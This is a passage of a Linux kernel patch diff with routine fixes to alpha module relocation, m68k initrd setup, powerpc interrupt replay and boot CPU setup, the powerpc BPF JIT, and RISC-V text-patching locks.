+@@ -146,10 +146,8 @@ apply_relocate_add(Elf64_Shdr *sechdrs, const char *strtab,
+ 	base = (void *)sechdrs[sechdrs[relsec].sh_info].sh_addr;
+ 	symtab = (Elf64_Sym *)sechdrs[symindex].sh_addr;
+ 
+-	/* The small sections were sorted to the end of the segment.
+-	   The following should definitely cover them.  */
+-	gp = (u64)me->core_layout.base + me->core_layout.size - 0x8000;
+ 	got = sechdrs[me->arch.gotsecindex].sh_addr;
++	gp = got + 0x8000;
+ 
+ 	for (i = 0; i < n; i++) {
+ 		unsigned long r_sym = ELF64_R_SYM (rela[i].r_info);
+diff --git a/arch/m68k/kernel/setup_mm.c b/arch/m68k/kernel/setup_mm.c
+index 3a2bb2e8fdad4..fbff1cea62caa 100644
+--- a/arch/m68k/kernel/setup_mm.c
++++ b/arch/m68k/kernel/setup_mm.c
+@@ -326,16 +326,16 @@ void __init setup_arch(char **cmdline_p)
+ 		panic("No configuration setup");
+ 	}
+ 
+-#ifdef CONFIG_BLK_DEV_INITRD
+-	if (m68k_ramdisk.size) {
++	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && m68k_ramdisk.size)
+ 		memblock_reserve(m68k_ramdisk.addr, m68k_ramdisk.size);
++
++	paging_init();
++
++	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && m68k_ramdisk.size) {
+ 		initrd_start = (unsigned long)phys_to_virt(m68k_ramdisk.addr);
+ 		initrd_end = initrd_start + m68k_ramdisk.size;
+ 		pr_info("initrd: %08lx - %08lx\n", initrd_start, initrd_end);
+ 	}
+-#endif
+-
+-	paging_init();
+ 
+ #ifdef CONFIG_NATFEAT
+ 	nf_init();
+diff --git a/arch/mips/include/asm/mach-rc32434/pci.h b/arch/mips/include/asm/mach-rc32434/pci.h
+index 9a6eefd127571..3eb767c8a4eec 100644
+--- a/arch/mips/include/asm/mach-rc32434/pci.h
++++ b/arch/mips/include/asm/mach-rc32434/pci.h
+@@ -374,7 +374,7 @@ struct pci_msu {
+ 				 PCI_CFG04_STAT_SSE | \
+ 				 PCI_CFG04_STAT_PE)
+ 
+-#define KORINA_CNFG1		((KORINA_STAT<<16)|KORINA_CMD)
++#define KORINA_CNFG1		(KORINA_STAT | KORINA_CMD)
+ 
+ #define KORINA_REVID		0
+ #define KORINA_CLASS_CODE	0
+diff --git a/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts b/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts
+index 73f8c998c64df..d4f5f159d6f23 100644
+--- a/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts
++++ b/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts
+@@ -10,7 +10,6 @@
+ 
+ / {
+ 	model = "fsl,T1040RDB-REV-A";
+-	compatible = "fsl,T1040RDB-REV-A";
+ };
+ 
+ &seville_port0 {
+diff --git a/arch/powerpc/include/asm/hw_irq.h b/arch/powerpc/include/asm/hw_irq.h
+index eb6d094083fd6..317659fdeacf2 100644
+--- a/arch/powerpc/include/asm/hw_irq.h
++++ b/arch/powerpc/include/asm/hw_irq.h
+@@ -36,15 +36,17 @@
+ #define PACA_IRQ_DEC		0x08 /* Or FIT */
+ #define PACA_IRQ_HMI		0x10
+ #define PACA_IRQ_PMI		0x20
++#define PACA_IRQ_REPLAYING	0x40
+ 
+ /*
+  * Some soft-masked interrupts must be hard masked until they are replayed
+  * (e.g., because the soft-masked handler does not clear the exception).
++ * Interrupt replay itself must remain hard masked too.
+  */
+ #ifdef CONFIG_PPC_BOOK3S
+-#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE|PACA_IRQ_PMI)
++#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE|PACA_IRQ_PMI|PACA_IRQ_REPLAYING)
+ #else
+-#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE)
++#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE|PACA_IRQ_REPLAYING)
+ #endif
+ 
+ #endif /* CONFIG_PPC64 */
+diff --git a/arch/powerpc/include/asm/paca.h b/arch/powerpc/include/asm/paca.h
+index 09f1790d0ae16..0ab3511a47d77 100644
+--- a/arch/powerpc/include/asm/paca.h
++++ b/arch/powerpc/include/asm/paca.h
+@@ -295,7 +295,6 @@ extern void free_unused_pacas(void);
+ 
+ #else /* CONFIG_PPC64 */
+ 
+-static inline void allocate_paca_ptrs(void) { }
+ static inline void allocate_paca(int cpu) { }
+ static inline void free_unused_pacas(void) { }
+ 
+diff --git a/arch/powerpc/include/asm/smp.h b/arch/powerpc/include/asm/smp.h
+index f63505d74932b..6c6cb53d70458 100644
+--- a/arch/powerpc/include/asm/smp.h
++++ b/arch/powerpc/include/asm/smp.h
+@@ -26,6 +26,7 @@
+ #include <asm/percpu.h>
+ 
+ extern int boot_cpuid;
++extern int boot_cpu_hwid; /* PPC64 only */
+ extern int spinning_secondaries;
+ extern u32 *cpu_to_phys_id;
+ extern bool coregroup_enabled;
+diff --git a/arch/powerpc/kernel/iommu.c b/arch/powerpc/kernel/iommu.c
+index caebe1431596e..ee95937bdaf14 100644
+--- a/arch/powerpc/kernel/iommu.c
++++ b/arch/powerpc/kernel/iommu.c
+@@ -67,11 +67,9 @@ static void iommu_debugfs_add(struct iommu_table *tbl)
+ static void iommu_debugfs_del(struct iommu_table *tbl)
+ {
+ 	char name[10];
+-	struct dentry *liobn_entry;
+ 
+ 	sprintf(name, "%08lx", tbl->it_index);
+-	liobn_entry = debugfs_lookup(name, iommu_debugfs_dir);
+-	debugfs_remove(liobn_entry);
++	debugfs_lookup_and_remove(name, iommu_debugfs_dir);
+ }
+ #else
+ static void iommu_debugfs_add(struct iommu_table *tbl){}
+diff --git a/arch/powerpc/kernel/irq_64.c b/arch/powerpc/kernel/irq_64.c
+index eb2b380e52a0d..9dc0ad3c533a8 100644
+--- a/arch/powerpc/kernel/irq_64.c
++++ b/arch/powerpc/kernel/irq_64.c
+@@ -70,22 +70,19 @@ int distribute_irqs = 1;
+ 
+ static inline void next_interrupt(struct pt_regs *regs)
+ {
+-	/*
+-	 * Softirq processing can enable/disable irqs, which will leave
+-	 * MSR[EE] enabled and the soft mask set to IRQS_DISABLED. Fix
+-	 * this up.
+-	 */
+-	if (!(local_paca->irq_happened & PACA_IRQ_HARD_DIS))
+-		hard_irq_disable();
+-	else
+-		irq_soft_mask_set(IRQS_ALL_DISABLED);
++	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
++		WARN_ON(!(local_paca->irq_happened & PACA_IRQ_HARD_DIS));
++		WARN_ON(irq_soft_mask_return() != IRQS_ALL_DISABLED);
++	}
+ 
+ 	/*
+ 	 * We are responding to the next interrupt, so interrupt-off
+ 	 * latencies should be reset here.
+ 	 */
++	lockdep_hardirq_exit();
+ 	trace_hardirqs_on();
+ 	trace_hardirqs_off();
++	lockdep_hardirq_enter();
+ }
+ 
+ static inline bool irq_happened_test_and_clear(u8 irq)
+@@ -97,22 +94,11 @@ static inline bool irq_happened_test_and_clear(u8 irq)
+ 	return false;
+ }
+ 
+-void replay_soft_interrupts(void)
++static void __replay_soft_interrupts(void)
+ {
+ 	struct pt_regs regs;
+ 
+ 	/*
+-	 * Be careful here, calling these interrupt handlers can cause
+-	 * softirqs to be raised, which they may run when calling irq_exit,
+-	 * which will cause local_irq_enable() to be run, which can then
+-	 * recurse into this function. Don't keep any state across
+-	 * interrupt handler calls which may change underneath us.
+-	 *
+-	 * Softirqs can not be disabled over replay to stop this recursion
+-	 * because interrupts taken in idle code may require RCU softirq
+-	 * to run in the irq RCU tracking context. This is a hard problem
+-	 * to fix without changes to the softirq or idle layer.
+-	 *
+ 	 * We use local_paca rather than get_paca() to avoid all the
+ 	 * debug_smp_processor_id() business in this low level function.
+ 	 */
+@@ -120,13 +106,20 @@ void replay_soft_interrupts(void)
+ 	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
+ 		WARN_ON_ONCE(mfmsr() & MSR_EE);
+ 		WARN_ON(!(local_paca->irq_happened & PACA_IRQ_HARD_DIS));
++		WARN_ON(local_paca->irq_happened & PACA_IRQ_REPLAYING);
+ 	}
+ 
++	/*
++	 * PACA_IRQ_REPLAYING prevents interrupt handlers from enabling
++	 * MSR[EE] to get PMIs, which can result in more IRQs becoming
++	 * pending.
++	 */
++	local_paca->irq_happened |= PACA_IRQ_REPLAYING;
++
+ 	ppc_save_regs(&regs);
+ 	regs.softe = IRQS_ENABLED;
+ 	regs.msr |= MSR_EE;
+ 
+-again:
+ 	/*
+ 	 * Force the delivery of pending soft-disabled interrupts on PS3.
+ 	 * Any HV call will have this side effect.
+@@ -175,13 +168,14 @@ again:
+ 		next_interrupt(&regs);
+ 	}
+ 
+-	/*
+-	 * Softirq processing can enable and disable interrupts, which can
+-	 * result in new irqs becoming pending. Must keep looping until we
+-	 * have cleared out all pending interrupts.
+-	 */
+-	if (local_paca->irq_happened & ~PACA_IRQ_HARD_DIS)
+-		goto again;
++	local_paca->irq_happened &= ~PACA_IRQ_REPLAYING;
++}
++
++void replay_soft_interrupts(void)
++{
++	irq_enter(); /* See comment in arch_local_irq_restore */
++	__replay_soft_interrupts();
++	irq_exit();
+ }
+ 
+ #if defined(CONFIG_PPC_BOOK3S_64) && defined(CONFIG_PPC_KUAP)
+@@ -200,13 +194,13 @@ static inline void replay_soft_interrupts_irqrestore(void)
+ 	if (kuap_state != AMR_KUAP_BLOCKED)
+ 		set_kuap(AMR_KUAP_BLOCKED);
+ 
+-	replay_soft_interrupts();
++	__replay_soft_interrupts();
+ 
+ 	if (kuap_state != AMR_KUAP_BLOCKED)
+ 		set_kuap(kuap_state);
+ }
+ #else
+-#define replay_soft_interrupts_irqrestore() replay_soft_interrupts()
++#define replay_soft_interrupts_irqrestore() __replay_soft_interrupts()
+ #endif
+ 
+ notrace void arch_local_irq_restore(unsigned long mask)
+@@ -219,9 +213,13 @@ notrace void arch_local_irq_restore(unsigned long mask)
+ 		return;
+ 	}
+ 
+-	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG))
+-		WARN_ON_ONCE(in_nmi() || in_hardirq());
++	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
++		WARN_ON_ONCE(in_nmi());
++		WARN_ON_ONCE(in_hardirq());
++		WARN_ON_ONCE(local_paca->irq_happened & PACA_IRQ_REPLAYING);
++	}
+ 
++again:
+ 	/*
+ 	 * After the stb, interrupts are unmasked and there are no interrupts
+ 	 * pending replay. The restart sequence makes this atomic with
+@@ -248,6 +246,12 @@ notrace void arch_local_irq_restore(unsigned long mask)
+ 	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG))
+ 		WARN_ON_ONCE(!(mfmsr() & MSR_EE));
+ 
++	/*
++	 * If we came here from the replay below, we might have a preempt
++	 * pending (due to preempt_enable_no_resched()). Have to check now.
++	 */
++	preempt_check_resched();
++
+ 	return;
+ 
+ happened:
+@@ -261,6 +265,7 @@ happened:
+ 		irq_soft_mask_set(IRQS_ENABLED);
+ 		local_paca->irq_happened = 0;
+ 		__hard_irq_enable();
++		preempt_check_resched();
+ 		return;
+ 	}
+ 
+@@ -296,12 +301,38 @@ happened:
+ 	irq_soft_mask_set(IRQS_ALL_DISABLED);
+ 	trace_hardirqs_off();
+ 
++	/*
++	 * Now enter interrupt context. The interrupt handlers themselves
++	 * also call irq_enter/exit (which is okay, they can nest). But call
++	 * it here now to hold off softirqs until the below irq_exit(). If
++	 * we allowed replayed handlers to run softirqs, that enables irqs,
++	 * which must replay interrupts, which recurses in here and makes
++	 * things more complicated. The recursion is limited to 2, and it can
++	 * be made to work, but it's complicated.
++	 *
++	 * local_bh_disable can not be used here because interrupts taken in
++	 * idle are not in the right context (RCU, tick, etc) to run softirqs
++	 * so irq_enter must be called.
++	 */
++	irq_enter();
++
+ 	replay_soft_interrupts_irqrestore();
+ 
++	irq_exit();
++
++	if (unlikely(local_paca->irq_happened != PACA_IRQ_HARD_DIS)) {
++		/*
++		 * The softirq processing in irq_exit() may enable interrupts
++		 * temporarily, which can result in MSR[EE] being enabled and
++		 * more irqs becoming pending. Go around again if that happens.
++		 */
++		trace_hardirqs_on();
++		preempt_enable_no_resched();
++		goto again;
++	}
++
+ 	trace_hardirqs_on();
+ 	irq_soft_mask_set(IRQS_ENABLED);
+-	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG))
+-		WARN_ON(local_paca->irq_happened != PACA_IRQ_HARD_DIS);
+ 	local_paca->irq_happened = 0;
+ 	__hard_irq_enable();
+ 	preempt_enable();
+diff --git a/arch/powerpc/kernel/process.c b/arch/powerpc/kernel/process.c
+index c22cc234672f9..effe9697905dc 100644
+--- a/arch/powerpc/kernel/process.c
++++ b/arch/powerpc/kernel/process.c
+@@ -1405,8 +1405,7 @@ static void show_instructions(struct pt_regs *regs)
+ 	for (i = 0; i < NR_INSN_TO_PRINT; i++) {
+ 		int instr;
+ 
+-		if (!__kernel_text_address(pc) ||
+-		    get_kernel_nofault(instr, (const void *)pc)) {
++		if (get_kernel_nofault(instr, (const void *)pc)) {
+ 			pr_cont("XXXXXXXX ");
+ 		} else {
+ 			if (nip == pc)
+diff --git a/arch/powerpc/kernel/prom.c b/arch/powerpc/kernel/prom.c
+index 4f1c920aa13ed..f318e8e1f3fe4 100644
+--- a/arch/powerpc/kernel/prom.c
++++ b/arch/powerpc/kernel/prom.c
+@@ -370,8 +370,8 @@ static int __init early_init_dt_scan_cpus(unsigned long node,
+ 	    be32_to_cpu(intserv[found_thread]));
+ 	boot_cpuid = found;
+ 
+-	// Pass the boot CPU's hard CPU id back to our caller
+-	*((u32 *)data) = be32_to_cpu(intserv[found_thread]);
++	if (IS_ENABLED(CONFIG_PPC64))
++		boot_cpu_hwid = be32_to_cpu(intserv[found_thread]);
+ 
+ 	/*
+ 	 * PAPR defines "logical" PVR values for cpus that
+@@ -755,7 +755,6 @@ static inline void save_fscr_to_task(void) {}
+ 
+ void __init early_init_devtree(void *params)
+ {
+-	u32 boot_cpu_hwid;
+ 	phys_addr_t limit;
+ 
+ 	DBG(" -> early_init_devtree(%px)\n", params);
+@@ -851,7 +850,7 @@ void __init early_init_devtree(void *params)
+ 	/* Retrieve CPU related informations from the flat tree
+ 	 * (altivec support, boot CPU ID, ...)
+ 	 */
+-	of_scan_flat_dt(early_init_dt_scan_cpus, &boot_cpu_hwid);
++	of_scan_flat_dt(early_init_dt_scan_cpus, NULL);
+ 	if (boot_cpuid < 0) {
+ 		printk("Failed to identify boot CPU !\n");
+ 		BUG();
+@@ -868,11 +867,6 @@ void __init early_init_devtree(void *params)
+ 
+ 	mmu_early_init_devtree();
+ 
+-	// NB. paca is not installed until later in early_setup()
+-	allocate_paca_ptrs();
+-	allocate_paca(boot_cpuid);
+-	set_hard_smp_processor_id(boot_cpuid, boot_cpu_hwid);
+-
+ #ifdef CONFIG_PPC_POWERNV
+ 	/* Scan and build the list of machine check recoverable ranges */
+ 	of_scan_flat_dt(early_init_dt_scan_recoverable_ranges, NULL);
+diff --git a/arch/powerpc/kernel/setup-common.c b/arch/powerpc/kernel/setup-common.c
+index 9b10e57040c6c..e77734e5a127f 100644
+--- a/arch/powerpc/kernel/setup-common.c
++++ b/arch/powerpc/kernel/setup-common.c
+@@ -87,6 +87,10 @@ EXPORT_SYMBOL(machine_id);
+ int boot_cpuid = -1;
+ EXPORT_SYMBOL_GPL(boot_cpuid);
+ 
++#ifdef CONFIG_PPC64
++int boot_cpu_hwid = -1;
++#endif
++
+ /*
+  * These are used in binfmt_elf.c to put aux entries on the stack
+  * for each elf executable being started.
+diff --git a/arch/powerpc/kernel/setup_64.c b/arch/powerpc/kernel/setup_64.c
+index a0dee7354fe6b..b2e0d3ce4261c 100644
+--- a/arch/powerpc/kernel/setup_64.c
++++ b/arch/powerpc/kernel/setup_64.c
+@@ -385,17 +385,21 @@ void __init early_setup(unsigned long dt_ptr)
+ 	/*
+ 	 * Do early initialization using the flattened device
+ 	 * tree, such as retrieving the physical memory map or
+-	 * calculating/retrieving the hash table size.
++	 * calculating/retrieving the hash table size, discover
++	 * boot_cpuid and boot_cpu_hwid.
+ 	 */
+ 	early_init_devtree(__va(dt_ptr));
+ 
+-	/* Now we know the logical id of our boot cpu, setup the paca. */
+-	if (boot_cpuid != 0) {
+-		/* Poison paca_ptrs[0] again if it's not the boot cpu */
+-		memset(&paca_ptrs[0], 0x88, sizeof(paca_ptrs[0]));
+-	}
++	allocate_paca_ptrs();
++	allocate_paca(boot_cpuid);
++	set_hard_smp_processor_id(boot_cpuid, boot_cpu_hwid);
+ 	fixup_boot_paca(paca_ptrs[boot_cpuid]);
+ 	setup_paca(paca_ptrs[boot_cpuid]); /* install the paca into registers */
++	// smp_processor_id() now reports boot_cpuid
++
++#ifdef CONFIG_SMP
++	task_thread_info(current)->cpu = boot_cpuid; // fix task_cpu(current)
++#endif
+ 
+ 	/*
+ 	 * Configure exception handlers. This include setting up trampolines
+diff --git a/arch/powerpc/kernel/time.c b/arch/powerpc/kernel/time.c
+index e26eb6618ae5d..9d8665910350c 100644
+--- a/arch/powerpc/kernel/time.c
++++ b/arch/powerpc/kernel/time.c
+@@ -356,7 +356,7 @@ void vtime_flush(struct task_struct *tsk)
+ }
+ #endif /* CONFIG_VIRT_CPU_ACCOUNTING_NATIVE */
+ 
+-void __delay(unsigned long loops)
++void __no_kcsan __delay(unsigned long loops)
+ {
+ 	unsigned long start;
+ 
+@@ -377,7 +377,7 @@ void __delay(unsigned long loops)
+ }
+ EXPORT_SYMBOL(__delay);
+ 
+-void udelay(unsigned long usecs)
++void __no_kcsan udelay(unsigned long usecs)
+ {
+ 	__delay(tb_ticks_per_usec * usecs);
+ }
+diff --git a/arch/powerpc/net/bpf_jit_comp32.c b/arch/powerpc/net/bpf_jit_comp32.c
+index a379b0ce19ffa..8643b2c8b76ef 100644
+--- a/arch/powerpc/net/bpf_jit_comp32.c
++++ b/arch/powerpc/net/bpf_jit_comp32.c
+@@ -79,6 +79,20 @@ static int bpf_jit_stack_offsetof(struct codegen_context *ctx, int reg)
+ #define SEEN_NVREG_FULL_MASK	0x0003ffff /* Non volatile registers r14-r31 */
+ #define SEEN_NVREG_TEMP_MASK	0x00001e01 /* BPF_REG_5, BPF_REG_AX, TMP_REG */
+ 
++static inline bool bpf_has_stack_frame(struct codegen_context *ctx)
++{
++	/*
++	 * We only need a stack frame if:
++	 * - we call other functions (kernel helpers), or
++	 * - we use non volatile registers, or
++	 * - we use tail call counter
++	 * - the bpf program uses its stack area
++	 * The latter condition is deduced from the usage of BPF_REG_FP
++	 */
++	return ctx->seen & (SEEN_FUNC | SEEN_TAILCALL | SEEN_NVREG_FULL_MASK) ||
++	       bpf_is_seen_register(ctx, bpf_to_ppc(BPF_REG_FP));
++}
++
+ void bpf_jit_realloc_regs(struct codegen_context *ctx)
+ {
+ 	unsigned int nvreg_mask;
+@@ -118,7 +132,8 @@ void bpf_jit_build_prologue(u32 *image, struct codegen_context *ctx)
+ 
+ #define BPF_TAILCALL_PROLOGUE_SIZE	4
+ 
+-	EMIT(PPC_RAW_STWU(_R1, _R1, -BPF_PPC_STACKFRAME(ctx)));
++	if (bpf_has_stack_frame(ctx))
++		EMIT(PPC_RAW_STWU(_R1, _R1, -BPF_PPC_STACKFRAME(ctx)));
+ 
+ 	if (ctx->seen & SEEN_TAILCALL)
+ 		EMIT(PPC_RAW_STW(_R4, _R1, bpf_jit_stack_offsetof(ctx, BPF_PPC_TC)));
+@@ -171,7 +186,8 @@ static void bpf_jit_emit_common_epilogue(u32 *image, struct codegen_context *ctx
+ 		EMIT(PPC_RAW_LWZ(_R0, _R1, BPF_PPC_STACKFRAME(ctx) + PPC_LR_STKOFF));
+ 
+ 	/* Tear down our stack frame */
+-	EMIT(PPC_RAW_ADDI(_R1, _R1, BPF_PPC_STACKFRAME(ctx)));
++	if (bpf_has_stack_frame(ctx))
++		EMIT(PPC_RAW_ADDI(_R1, _R1, BPF_PPC_STACKFRAME(ctx)));
+ 
+ 	if (ctx->seen & SEEN_FUNC)
+ 		EMIT(PPC_RAW_MTLR(_R0));
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index 56b9219981665..5931a0ff3c814 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -87,6 +87,13 @@ endif
+ # Avoid generating .eh_frame sections.
+ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables -fno-unwind-tables
+ 
++# The RISC-V attributes frequently cause compatibility issues and provide no
++# information, so just turn them off.
++KBUILD_CFLAGS += $(call cc-option,-mno-riscv-attribute)
++KBUILD_AFLAGS += $(call cc-option,-mno-riscv-attribute)
++KBUILD_CFLAGS += $(call as-option,-Wa$(comma)-mno-arch-attr)
++KBUILD_AFLAGS += $(call as-option,-Wa$(comma)-mno-arch-attr)
++
+ KBUILD_CFLAGS_MODULE += $(call cc-option,-mno-relax)
+ KBUILD_AFLAGS_MODULE += $(call as-option,-Wa$(comma)-mno-relax)
+ 
+diff --git a/arch/riscv/errata/sifive/errata.c b/arch/riscv/errata/sifive/errata.c
+index 1031038423e74..c24a349dd026d 100644
+--- a/arch/riscv/errata/sifive/errata.c
++++ b/arch/riscv/errata/sifive/errata.c
+@@ -4,6 +4,7 @@
+  */
+ 
+ #include <linux/kernel.h>
++#include <linux/memory.h>
+ #include <linux/module.h>
+ #include <linux/string.h>
+ #include <linux/bug.h>
+@@ -107,7 +108,9 @@ void __init_or_module sifive_errata_patch_func(struct alt_entry *begin,
+ 
+ 		tmp = (1U << alt->errata_id);
+ 		if (cpu_req_errata & tmp) {
++			mutex_lock(&text_mutex);
+ 			patch_text_nosync(alt->old_ptr, alt->alt_ptr, alt->alt_len);
++			mutex_unlock(&text_mutex);
+ 			cpu_apply_errata |= tmp;
+ 		}
+ 	}
+diff --git a/arch/riscv/errata/thead/errata.c b/arch/riscv/errata/thead/errata.c
+index fac5742d1c1e6..9d71fe3d35c77 100644
+--- a/arch/riscv/errata/thead/errata.c
++++ b/arch/riscv/errata/thead/errata.c
+@@ -5,6 +5,7 @@
+ 
+ #include <linux/bug.h>
+ #include <linux/kernel.h>
++#include <linux/memory.h>
+ #include <linux/module.h>
+ #include <linux/string.h>
+ #include <linux/uaccess.h>
+@@ -97,11 +98,14 @@ void __init_or_module thead_errata_patch_func(struct alt_entry *begin, struct al
+ 		tmp = (1U << alt->errata_id);
+ 		if (cpu_req_errata & tmp) {
+ 			/* On vm-alternatives, the mmu isn't running yet */
+-			if (stage == RISCV_ALTERNATIVES_EARLY_BOOT)
++			if (stage == RISCV_ALTERNATIVES_EARLY_BOOT) {
+ 				memcpy((void *)__pa_symbol(alt->old_ptr),
+ 				       (void *)__pa_symbol(alt->alt_ptr), alt->alt_len);
+-			else
++			} else {
++				mutex_lock(&text_mutex);
+ 				patch_text_nosync(alt->old_ptr, alt->alt_ptr, alt->alt_len);
++				mutex_unlock(&text_mutex);
++			}
+ 		}
+ 	}
+ 
+diff --git a/arch/riscv/include/asm/ftrace.h b/arch/riscv/include/asm/ftrace.h
+index 9e73922e1e2e5..d47d87c2d7e3d 100644
+--- a/arch/riscv/include/asm/ftrace.h
++++ b/arch/riscv/include/asm/ftrace.h
+@@ -109,6 +109,6 @@ int ftrace_init_nop(struct module *mod, struct dyn_ftrace *rec);
+ #define ftrace_init_nop ftrace_init_nop
+ #endif
+ 
+-#endif
++#endif /* CONFIG_DYNAMIC_FTRACE */
+ 
+ #endif /* _ASM_RISCV_FTRACE_H */
+diff --git a/arch/riscv/include/asm/parse_asm.h b/arch/riscv/include/asm/parse_asm.h
+index f36368de839f5..3cd00332d70f5 100644
+--- a/arch/riscv/include/asm/parse_asm.h
++++ b/arch/riscv/include/asm/parse_asm.h
+@@ -3,6 +3,9 @@
+  * Copyright (C) 2020 SiFive
+  */
+ 
++#ifndef _ASM_RISCV_INSN_H
++#define _ASM_RISCV_INSN_H
++
+ #include <linux/bits.h>
+ 
+ /* The bit field of immediate value in I-type instruction */
+@@ -217,3 +220,5 @@ static inline bool is_ ## INSN_NAME ## _insn(long insn) \
+ 	(RVC_X(x_, RVC_B_IMM_5_OPOFF, RVC_B_IMM_5_MASK) << RVC_B_IMM_5_OFF) | \
+ 	(RVC_X(x_, RVC_B_IMM_7_6_OPOFF, RVC_B_IMM_7_6_MASK) << RVC_B_IMM_7_6_OFF) | \
+ 	(RVC_IMM_SIGN(x_) << RVC_B_IMM_SIGN_OFF); })
++
++#endif /* _ASM_RISCV_INSN_H */
+diff --git a/arch/riscv/include/asm/patch.h b/arch/riscv/include/asm/patch.h
+index 9a7d7346001ee..98d9de07cba17 100644
+--- a/arch/riscv/include/asm/patch.h
++++ b/arch/riscv/include/asm/patch.h
+@@ -9,4 +9,6 @@
+ int patch_text_nosync(void *addr, const void *insns, size_t len);
+ int patch_text(void *addr, u32 insn);
+ 
++extern int riscv_patch_in_stop_machine;
++
+ #endif /* _ASM_RISCV_PATCH_H */
+diff --git a/arch/riscv/kernel/compat_vdso/Makefile b/arch/riscv/kernel/compat_vdso/Makefile
+index 260daf3236d3a..7f34f3c7c8827 100644
+--- a/arch/riscv/kernel/compat_vdso/Makefile
++++ b/arch/riscv/kernel/compat_vdso/Makefile
+@@ -14,6 +14,10 @@ COMPAT_LD := $(LD)
+ COMPAT_CC_FLAGS := -march=rv32g -mabi=ilp32
+ COMPAT_LD_FLAGS := -melf32lriscv
+ 
++# Disable attributes, as they're useless and break the build.
++COMPAT_CC_FLAGS += $(call cc-option,-mno-riscv-attribute)
++COMPAT_CC_FLAGS += $(call as-option,-Wa$(comma)-mno-arch-attr)
++
+ # Files to link into the compat_vdso
+ obj-compat_vdso = $(patsubst %, %.o, $(compat_vdso-syms)) note.o
+ 
+diff --git a/arch/riscv/kernel/cpufeature.c b/arch/riscv/kernel/cpufeature.c
+index 93e45560af307..5a82d5520a1fd 100644
+--- a/arch/riscv/kernel/cpufeature.c
++++ b/arch/riscv/kernel/cpufeature.c
+@@ -10,6 +10,7 @@
+ #include <linux/ctype.h>
+ #include <linux/libfdt.h>
+ #include <linux/log2.h>
++#include <linux/memory.h>
+ #include <linux/module.h>
+ #include <linux/of.h>
+ #include <asm/alternative.h>
+@@ -339,8 +340,11 @@ void __init_or_module riscv_cpufeature_patch_func(struct alt_entry *begin,
+ 		}
+ 
+ 		tmp = (1U << alt->errata_id);
+-		if (cpu_req_feature & tmp)
++		if (cpu_req_feature & tmp) {
++			mutex_lock(&text_mutex);
+ 			patch_text_nosync(alt->old_ptr, alt->alt_ptr, alt->alt_len);
++			mutex_unlock(&text_mutex);
++		}
+ 	}
+ }
+ #endif
+diff --git a/arch/riscv/kernel/ftrace.c b/arch/riscv/kernel/ftrace.c
+index 5bff37af4770b..03a6434a8cdd0 100644
+--- a/arch/riscv/kernel/ftrace.c
++++ b/arch/riscv/kernel/ftrace.c
+@@ -15,10 +15,19 @@
+ void ftrace_arch_code_modify_prepare(void) __acquires(&text_mutex)
+ {
+ 	mutex_lock(&text_mutex);
++
++	/*
++	 * The code sequences we use for ftrace can't be patched while the
++	 * kernel is running, so we need to use stop_machine() to modify them
++	 * for now.  This doesn't play nice with text_mutex, we use this flag
++	 * to elide the check.
++	 */
++	riscv_patch_in_stop_machine = true;
+ }
+ 
+ void ftrace_arch_code_modify_post_process(void) __releases(&text_mutex)
+ {
++	riscv_patch_in_stop_machine = false;
+ 	mutex_unlock(&text_mutex);
+ }
+ 
+@@ -107,9 +116,9 @@ int ftrace_init_nop(struct module *mod, struct dyn_ftrace *rec)
+ {
+ 	int out;
+ 
+-	ftrace_arch_code_modify_prepare();
++	mutex_lock(&text_mutex);
+ 	out = ftrace_make_nop(mod, rec, MCOUNT_ADDR);
+-	ftrace_arch_code_modify_post_process();
++	mutex_unlock(&text_mutex);
+ 
+ 	return out;
+ }
+diff --git a/arch/riscv/kernel/patch.c b/arch/riscv/kernel/patch.c
+index 765004b605132..e099961453cca 100644
+--- a/arch/riscv/kernel/patch.c
++++ b/arch/riscv/kernel/patch.c
+@@ -11,6 +11,7 @@
+ #include <asm/kprobes.h>
+ #include <asm/cacheflush.h>
+ #include <asm/fixmap.h>
++#include <asm/ftrace.h>
+ #include <asm/patch.h>
+ 
+ struct patch_insn {
+@@ -19,6 +20,8 @@ struct patch_insn {
+ 	atomic_t cpu_count;
+ };
+ 
++int riscv_patch_in_stop_machine = false;
++
+ #ifdef CONFIG_MMU
+ /*
+  * The fix_to_virt(, idx) needs a const value (not a dynamic variable of
+@@ -59,8 +62,15 @@ static int patch_insn_write(void *addr, const void *insn, size_t len)
+ 	 * Before reaching here, it was expected to lock the text_mutex
+ 	 * already, so we don't need to give another lock here and could
+ 	 * ensure that it was safe between each cores.
++	 *
++	 * We're currently using stop_machine() for ftrace & kprobes, and while
++	 * that ensures text_mutex is held before installing the mappings it
++	 * does not ensure text_mutex is held by the calling thread.  That's
++	 * safe but triggers a lockdep failure, so just elide it for that
++	 * specific case.
+ 	 */
+-	lockdep_assert_held(&text_mutex);
++	if (!riscv_patch_in_stop_machine)
++		lockdep_assert_held(&text_mutex);
+ 
+ 	if (across_pages)
+ 		patch_map(addr + len, FIX_TEXT_POKE1);
+@@ -121,13 +131,25 @@ NOKPROBE_SYMBOL(patch_text_cb);
+ 
+ int patch_text(void *addr, u32 insn)
+ {
++	int ret;
+ 	struct patch_insn patch = {
+ 		.addr = addr,
+ 		.insn = insn,
+ 		.cpu_count = ATOMIC_INIT(0),
+ 	};
+ 
+-	return stop_machine_cpuslocked(patch_text_cb,
+-				       &patch, cpu_online_mask);
++	/*
